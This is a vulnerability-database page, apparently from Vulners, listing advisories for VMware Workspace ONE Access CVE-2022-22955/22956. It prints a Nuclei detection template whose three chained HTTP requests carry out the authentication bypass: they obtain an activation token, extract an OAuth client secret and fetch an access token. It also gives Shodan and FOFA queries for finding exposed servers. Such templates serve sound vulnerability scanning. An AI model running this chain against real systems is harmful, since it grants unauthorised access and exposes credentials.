| Reporter | Title | Published | Views | Family All 34 |
|---|---|---|---|---|
| VMware Workspace ONE Remote Code Execution Exploit | 18 Apr 202300:00 | – | zdt | |
| CVE-2022-22955 | 13 Apr 202218:15 | – | attackerkb | |
| The vulnerability of the OAuth2 ACS access control service of the VMware Workspace One Access application management platform allows a perpetrator to bypass the authentication process and gain unauthorized access to the application. | 8 Apr 202200:00 | – | bdu_fstec | |
| The vulnerability of the OAuth2 ACS access control service of the VMware Workspace One Access application management platform allows a perpetrator to bypass the authentication process and gain unauthorized access to the application. | 8 Apr 202200:00 | – | bdu_fstec | |
| CVE-2022-22955 | 7 Apr 202204:00 | – | circl | |
| CVE-2022-22956 | 7 Apr 202204:00 | – | circl | |
| Vmware Workspace One Access 授权问题漏洞 | 6 Apr 202200:00 | – | cnnvd | |
| 多款 VMware 产品授权问题漏洞 | 6 Apr 202200:00 | – | cnnvd | |
| CVE-2022-22955 | 13 Apr 202217:05 | – | cve | |
| CVE-2022-22956 | 13 Apr 202200:00 | – | cve |
id: CVE-2022-22956
info:
name: VMware Workspace ONE Access - Authentication Bypass
author: daffainfo
severity: critical
description: |
VMware Workspace ONE Access has two authentication bypass vulnerabilities (CVE-2022-22955 & CVE-2022-22956) in the OAuth2 ACS framework. A malicious actor may bypass the authentication mechanism and execute any operation due to exposed endpoints in the authentication framework.
impact: |
Attackers can bypass authentication and perform unauthorized operations, potentially leading to full system compromise.
remediation: |
Apply the latest security patches provided by VMware to address these vulnerabilities.
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/vmware_workspace_one_access_vmsa_2022_0011_chain.rb
- https://srcincite.io/blog/2022/08/11/i-am-whoever-i-say-i-am-infiltrating-vmware-workspace-one-access-using-a-0-click-exploit.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-22956
- http://packetstormsecurity.com/files/171918/Mware-Workspace-ONE-Remote-Code-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-22956
cwe-id: CWE-287
epss-score: 0.50694
epss-percentile: 0.98784
cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: vmware
product: identity_manager
shodan-query: http.favicon.hash:"-1250474341"
fofa-query: icon_hash=-1250474341
tags: cve,cve2022,vmware,workspace,auth-bypass,vkev,vuln
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
POST /SAAS/API/1.0/REST/oauth2/generateActivationToken/Service__OAuth2Client HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
matchers:
- type: dsl
dsl:
- 'contains_all(body, "activationToken", "_links")'
- 'contains(header, "application/json")'
- 'status_code == 200'
condition: and
internal: true
extractors:
- type: json
name: activation_token
json:
- '.activationToken'
internal: true
- raw:
- |
POST /SAAS/API/1.0/REST/oauth2/activate HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{{activation_token}}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "client_id", "client_secret")'
- 'contains(header, "application/json")'
- 'status_code == 200'
condition: and
internal: true
extractors:
- type: json
name: client_id
json:
- '.client_id'
internal: true
- type: json
name: client_secret
json:
- '.client_secret'
internal: true
- raw:
- |
POST /SAAS/auth/oauthtoken HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
grant_type=client_credentials&client_id={{client_id}}&client_secret={{client_secret}}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "access_token", "token_type")'
- 'contains(header, "application/json")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100b638fb48482f7e60aa41f4b3a261ccc7b022f41541a587655aa0caf44365633c02202bcbdc6ea7adeeeb86965383895ce65af910eb66f73d8e044fce7e93ac9dcb8d:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation